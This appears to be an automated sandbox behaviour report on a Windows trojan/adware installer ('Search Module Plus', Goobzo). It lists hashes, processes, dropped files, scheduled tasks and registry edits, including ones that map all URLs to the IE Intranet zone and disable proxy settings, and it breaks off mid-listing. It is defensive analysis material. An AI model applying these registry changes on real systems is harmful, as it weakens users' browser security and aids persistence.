MD5: bf54b1bcc16d139e348a405c59ad7780
SHA1: 8ab0343956457e11833add28db09051757e9fe95
SHA256: 4a226f6218ac68c03436fa7c7ff8833e888cf13d0ad4de042c6d7c184cc0f85b
SSDeep: 24576:bQDVlebce8oGa/jZxHe5J4Gg6qgUGKT12lDKVovL4jTtLXaui3U:0ScvoGa/jZA5yvcJKT12cVovMPtLXaur
Size: 1211368 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2015-06-23 10:18:22
Analyzed on: WindowsXP SP3 32-bit

Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

smu.exe:1036
smu.exe:896
smu.exe:772
wscript.exe:908
sma.exe:2200
sma.exe:2052
sma.exe:204
sma.exe:1760
sma.exe:2064
sma.exe:376

The Trojan injects its code into the following process(es):

%original file name%.exe:1304
%original file name%.exe:1944
ins_smk.exe:1136

Mutexes

The following mutexes were created/opened:

ZonesCacheCounterMutex
ZonesLockedCacheCounterMutex
ZonesCounterMutex
TSMtx15287
ShimCacheMutex
RasPbFile
WininetProxyRegistryMutex
WininetConnectionMutex
WininetStartupMutex
c:!documents and settings!adm!local settings!history!history.ie5!
c:!documents and settings!adm!cookies!
c:!documents and settings!adm!local settings!temporary internet files!content.ie5!
_!MSFTHISTORY!_
DBWinMutex
oleacc-msaa-loaded

File activity

The process smu.exe:1036 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\All Users\Application Data\SearchModulePlus\smhe.js (411 bytes)

The process smu.exe:896 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Tasks\SMW_UpdateTask_Time_3835323735333432352d3437415a556c2a3223346c41.job (968 bytes)
%Documents and Settings%\All Users\Application Data\SearchModulePlus\smhe.js (407 bytes)

The process %original file name%.exe:1944 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\Install_6989\ins_smk.exe (49916 bytes)

The process ins_smk.exe:1136 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\Common Files\Goobzo\GBUpdatePlus\SMUninstall.exe (19096 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\sma.exe (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz2.tmp (312459 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\SBIEBrowserHelperObject.dll (784 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\smci32.dll (34561 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp3.tmp\System.dll (11 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\smei32.dll (24832 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\smri32.dll (13584 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\smoi32.dll (14184 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp3.tmp\ns5.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp3.tmp\nsExec.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp3.tmp\AccDownload.dll (11344 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\smu.exe (58402 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\smi32.exe (2392 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\Updater.exe (25112 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\smw.sys (784 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\smfi32.dll (23296 bytes)
%WinDir%\Tasks\SMWPUpd.job (1152 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsp3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nse1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn4.tmp (0 bytes)

Registry activity

The process smu.exe:1036 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E1 B8 62 06 3E BC EF 67 D2 59 AB 8A 31 E5 4F FB"

[HKLM\SOFTWARE\SearchModulePlus\SMUpdPlus]
"Rlt" = "Type: REG_QWORD, Length: 8"
"Scf" = "FA 1F 81 A8 FA 75 0F C1 27 9D 68 F5 FE 0C 83 47"
"Ubl" = ""

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows]
"LoadAppInit_DLLs" = "0"

[HKLM\SOFTWARE\SearchModulePlus\SMUpdPlus]
"Gcf" = "24 0E 30 0B EC 13 CF 07 96 50 89 ED FD 87 DC FB"
"Ult" = "Type: REG_QWORD, Length: 8"

The process smu.exe:896 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FC E1 83 7F C0 7F 9A 06 D5 7B 89 E5 C2 59 E1 D3"

[HKLM\SOFTWARE\SearchModulePlus\SMUpdPlus]
"Rlt" = "Type: REG_QWORD, Length: 8"
"Scf" = "F6 6E 5E 45 8E 18 0F CC 80 5C BE 4A 13 53 D4 3C"

[HKLM\SOFTWARE\Wow6432Node\SearchModulePlus\SMUpdPlus\Users\Default]
"Ucf" = "AF 19 06 18 24 A7 78 A7 83 2B E1 77 84 81 A9 3B"

[HKLM\SOFTWARE\SearchModulePlus\SMUpdPlus\Users\Default]
"Spt" = "0E 67 60 5E E3 C9 4E D4 C3 0C 82 C4 22 7A B0 07"

[HKLM\SOFTWARE\SearchModulePlus\SMUpdPlus]
"Gcf" = "D9 A5 D4 C7 0B 94 E4 04 31 95 5A 08 A8 9B 13 3E"

[HKLM\SOFTWARE\SearchModulePlus\SMUpdPlus\Users\Default]
"Ucf" = "AF 19 06 18 24 A7 78 A7 83 2B E1 77 84 81 A9 3B"

The process smu.exe:772 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "55 25 02 80 F8 4C 10 28 50 FA E6 E0 A9 23 9F B8"

[HKLM\SOFTWARE\SearchModulePlus\SMUpdPlus]
"Scf" = "4C 3B 94 75 38 D5 25 8E 16 E8 44 8C 7E D9 A1 FB"

The process wscript.exe:908 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BD 8D F3 CB 88 2C DD 74 9C 75 D8 1D B9 01 06 51"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\Common Files\Goobzo\GBUpdatePlus]
"smu.exe" = "Search Module Plus Update Service"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

The process sma.exe:2200 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FB D3 86 1A DA 9A 4B 0F 68 10 B1 D8 FC F3 5F 2B"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 06 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

Proxy settings are disabled:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoConfigURL"
"ProxyServer"

The process sma.exe:2052 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0E 21 AC BE E9 CF CB F7 E0 F2 A5 8E 97 37 D4 52"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 04 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

Proxy settings are disabled:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoConfigURL"
"ProxyServer"

The process sma.exe:204 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 2A 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1B 17 AD 05 25 90 E9 F6 1E 2F 63 28 C9 3F 1E B9"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process sma.exe:1760 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 2B 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "83 B1 86 F5 67 F5 C0 D1 D8 45 E5 9B 31 C4 57 36"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process sma.exe:2064 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6D F5 A7 1B EC 4A 33 40 DE 64 0F 27 3D 73 3E 8D"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 05 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

Proxy settings are disabled:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoConfigURL"
"ProxyServer"

The process sma.exe:376 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6D F1 8F 31 67 A1 F6 8E 3A 71 3A FB C7 79 09 8B"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\LocalService\Cookies"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 03 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\LocalService\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

Proxy settings are disabled:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoConfigURL"
"ProxyServer"

The process %original file name%.exe:1304 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
